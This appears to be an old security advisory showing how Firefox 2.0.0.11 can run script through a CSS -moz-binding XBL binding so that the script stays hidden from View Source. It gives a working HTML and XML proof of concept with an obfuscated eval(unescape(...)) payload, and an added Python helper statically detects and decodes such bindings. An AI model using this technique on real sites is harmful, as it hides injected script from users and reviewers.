########################## WwW.BugReport.ir ########################
#
#      AmnPardaz Security Research Team
#
# Bug Title: Mozilla Firefox 2.0.0.11 Hide The Source Code
# Vendor URL: www.mozilla.org
# Version: <= 2.0.0.11
# Solution: N/A
#
######################### WwW.AmnPardaz.com ########################

####################
- Description:
####################

To do this we need 2 files (HTML, XML). Their code is given below.
Save the code below in an HTML file.
--------------------------------------------------------------------
<html>
<head>
<style>BODY{-moz-binding:url("moz.xml#xss")}</style>
</head>
<body>
1- Do you see any Source Code by viewing the page source? No!
<script>
alert('Soroush Dalili from BugReport.IR has something new for you! - Maybe there are some malicious codes instead of my name!')
</script>
</body>
</html>
--------------------------------------------------------------------

Then save the code below in a file named "moz.xml".
--------------------------------------------------------------------
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<binding id="xss">
<implementation>
<constructor><![CDATA[
// The constructor runs when the binding is attached to the bound element (BODY here).
document.write('2 - Do you see any Source Code by viewing the page source? No! Your browser "Mozilla Firefox 2.0.0.11" is looking for something!')
eval(unescape('%61%6c%65%72%74%28%27%54%68%69%73%20%69%73%20%6e%65%77%20%70%61%67%65%2e%20%77%68%65%72%65%20%69%73%20%70%61%67%65%20%31%3f%20%77%68%65%72%65%20%61%72%65%20%74%68%65%20%73%6f%75%72%63%65%20%63%6f%64%65%20%6f%66%20%70%61%67%65%20%31%20%61%6e%64%20%70%61%67%65%20%32%3f%27%29'));
]]></constructor>
</implementation>
</binding>
</bindings>
--------------------------------------------------------------------

Now open the HTML file in Mozilla Firefox <= 2.0.0.11 and it will work!

####################
- Credit :
####################
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
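
Added example (not part of the original advisory): since "View Source" cannot be relied on for a page like this, the Python helper below inspects saved copies statically, listing every -moz-binding reference, pulling the constructor script out of the referenced XBL binding, and decoding unescape() arguments without executing anything. All function names and the sample inputs are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

XBL_NS = "{http://www.mozilla.org/xbl}"
BINDING_RE = re.compile(r"-moz-binding\s*:\s*url\(\s*[\"']?([^\"')\s]+)", re.I)
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)")
ESCAPE_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")

# Constructed sample input modelled on the advisory's two files.
SAMPLE_HTML = '<html><head><style>BODY{-moz-binding:url("moz.xml#xss")}</style></head></html>'
SAMPLE_XBL = """<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation>
<constructor><![CDATA[ eval(unescape('%61%6c%65%72%74%28%31%29')); ]]></constructor>
</implementation></binding></bindings>"""

def find_bindings(text):
    """Return (document, binding_id) for every -moz-binding url() in HTML/CSS."""
    return [tuple(m.group(1).partition("#")[::2]) for m in BINDING_RE.finditer(text)]

def js_unescape(s):
    """Static equivalent of JavaScript unescape(): %XX and %uXXXX code units."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def constructor_scripts(xbl_text, binding_id):
    """Script text of each <constructor> in the named XBL binding."""
    root = ET.fromstring(xbl_text)
    return [c.text or ""
            for b in root.iter(XBL_NS + "binding") if b.get("id") == binding_id
            for c in b.iter(XBL_NS + "constructor")]

def triage(html, resources):
    """resources: {binding document name: its text}, supplied by the caller."""
    findings = []
    for doc, bid in find_bindings(html):
        scripts = constructor_scripts(resources[doc], bid) if doc in resources else []
        decoded = [js_unescape(m.group(2)) for s in scripts for m in UNESCAPE_RE.finditer(s)]
        findings.append({"document": doc, "binding": bid,
                         "constructors": len(scripts), "decoded": decoded})
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_HTML, {"moz.xml": SAMPLE_XBL}):
        print(finding)
```

A finding with "constructors": 0 means the page references a binding document that was not supplied, so that file still has to be collected and reviewed.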